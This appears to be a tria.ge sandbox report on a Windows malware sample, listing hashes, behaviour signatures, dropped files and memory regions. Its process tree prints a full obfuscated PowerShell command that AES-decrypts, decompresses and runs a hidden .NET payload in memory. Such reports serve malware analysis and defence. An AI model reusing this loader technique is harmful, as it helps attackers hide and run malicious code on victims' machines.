Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Resubmissions

10/02/2023, 22:59

230210-2yskbahe71 7

10/02/2023, 22:48

230210-2q3ejshe88 7

Analysis

  • max time kernel
    888s
  • max time network
    898s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    10/02/2023, 22:59

General

  • Target

    8609A8A1EFC7A4D2C0282CE10BC25B409A416C8CC9CF7C677CA2CCB1302D994F.exe

  • Size

    14.8MB

  • MD5

    274069bb41e7093eb4802f0a8c8ae123

  • SHA1

    835b054cf117944407b5f909a8c065f4619cd01c

  • SHA256

    8609a8a1efc7a4d2c0282ce10bc25b409a416c8cc9cf7c677ca2ccb1302d994f

  • SHA512

    1d9b99b68ad422e29c5fc23e8291153581ebb375c641885e5f94ed688b6ab75a3d09c43e953255a7d955501a4797eec79467a144fc0fc2b97b04b4ec69660a39

  • SSDEEP

    6144:6ahONp0yN90QECH6qXA7g5Zo4cfqcOzYxH1hJHhUfmGedmfFnX4sEK:6ily90YaqcgUacOUx9HhOFeE9nIlK

Score
7/10

Malware Config

Signatures

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\8609A8A1EFC7A4D2C0282CE10BC25B409A416C8CC9CF7C677CA2CCB1302D994F.exe
    "C:\Users\Admin\AppData\Local\Temp\8609A8A1EFC7A4D2C0282CE10BC25B409A416C8CC9CF7C677CA2CCB1302D994F.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:268
    • C:\Windows\system32\cmd.exe
      cmd /c Up.bat
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1168
      • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Up.bat.exe
        "Up.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $SaAbs = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Up.bat').Split([Environment]::NewLine);foreach ($UFyiL in $SaAbs) { if ($UFyiL.StartsWith(':: ')) { $YQujV = $UFyiL.Substring(3); break; }; };$RazOX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($YQujV);$MjptO = New-Object System.Security.Cryptography.AesManaged;$MjptO.Mode = [System.Security.Cryptography.CipherMode]::CBC;$MjptO.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$MjptO.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jd47GHuiydSoko9oLdGQxC9WO8IZyj5IWAA4bz8g7is=');$MjptO.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5uySHjMtqAtyGaRnEWTbpQ==');$PqYhT = $MjptO.CreateDecryptor();$RazOX = $PqYhT.TransformFinalBlock($RazOX, 0, $RazOX.Length);$PqYhT.Dispose();$MjptO.Dispose();$shGEU = New-Object System.IO.MemoryStream(, $RazOX);$CoAGN = New-Object System.IO.MemoryStream;$mQWhw = New-Object System.IO.Compression.GZipStream($shGEU, [IO.Compression.CompressionMode]::Decompress);$mQWhw.CopyTo($CoAGN);$mQWhw.Dispose();$shGEU.Dispose();$CoAGN.Dispose();$RazOX = $CoAGN.ToArray();$pJsJl = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($RazOX);$RHiDW = $pJsJl.EntryPoint;$RHiDW.Invoke($null, (, [string[]] ('')))
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2036

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Up.bat

    Filesize

    450.0MB

    MD5

    2ab94aa86594eca58d642dd64be93b2b

    SHA1

    ba969f3e392eb1d93eaa40972bb01c2127dd5e84

    SHA256

    b4c174a6da244980457cfb09ef25eae827d151264fa837ae8c0b6351d7ee42bf

    SHA512

    7ff30cb915af868ff4176dfb465799c395175635626190ff61812a59924e96c0cf5c238a5ebd42c70423ddb2f8313e75b63b6e02ca2cc5e33a2a09255faf3397

  • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Up.bat.exe

    Filesize

    462KB

    MD5

    852d67a27e454bd389fa7f02a8cbe23f

    SHA1

    5330fedad485e0e4c23b2abe1075a1f984fde9fc

    SHA256

    a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8

    SHA512

    327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

  • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Up.bat.exe

    Filesize

    462KB

    MD5

    852d67a27e454bd389fa7f02a8cbe23f

    SHA1

    5330fedad485e0e4c23b2abe1075a1f984fde9fc

    SHA256

    a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8

    SHA512

    327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

  • \Users\Admin\AppData\Local\Temp\IXP000.TMP\Up.bat.exe

    Filesize

    462KB

    MD5

    852d67a27e454bd389fa7f02a8cbe23f

    SHA1

    5330fedad485e0e4c23b2abe1075a1f984fde9fc

    SHA256

    a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8

    SHA512

    327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

  • memory/268-54-0x000007FEFC101000-0x000007FEFC103000-memory.dmp

    Filesize

    8KB

  • memory/2036-61-0x000007FEF4E60000-0x000007FEF5883000-memory.dmp

    Filesize

    10.1MB

  • memory/2036-63-0x0000000002514000-0x0000000002517000-memory.dmp

    Filesize

    12KB

  • memory/2036-62-0x000007FEF4300000-0x000007FEF4E5D000-memory.dmp

    Filesize

    11.4MB

  • memory/2036-64-0x0000000002514000-0x0000000002517000-memory.dmp

    Filesize

    12KB

  • memory/2036-65-0x000000000251B000-0x000000000253A000-memory.dmp

    Filesize

    124KB

  • memory/2036-66-0x0000000002514000-0x0000000002517000-memory.dmp

    Filesize

    12KB

  • memory/2036-67-0x000000000251B000-0x000000000253A000-memory.dmp

    Filesize

    124KB